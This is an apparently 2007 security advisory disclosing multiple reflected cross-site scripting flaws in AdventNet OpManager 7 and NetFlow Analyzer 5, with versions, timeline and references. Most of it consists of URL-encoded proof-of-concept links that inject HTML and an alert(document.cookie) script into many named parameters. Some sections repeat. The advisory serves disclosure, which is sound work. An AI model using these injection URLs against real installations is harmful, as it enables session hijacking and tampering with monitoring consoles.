http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)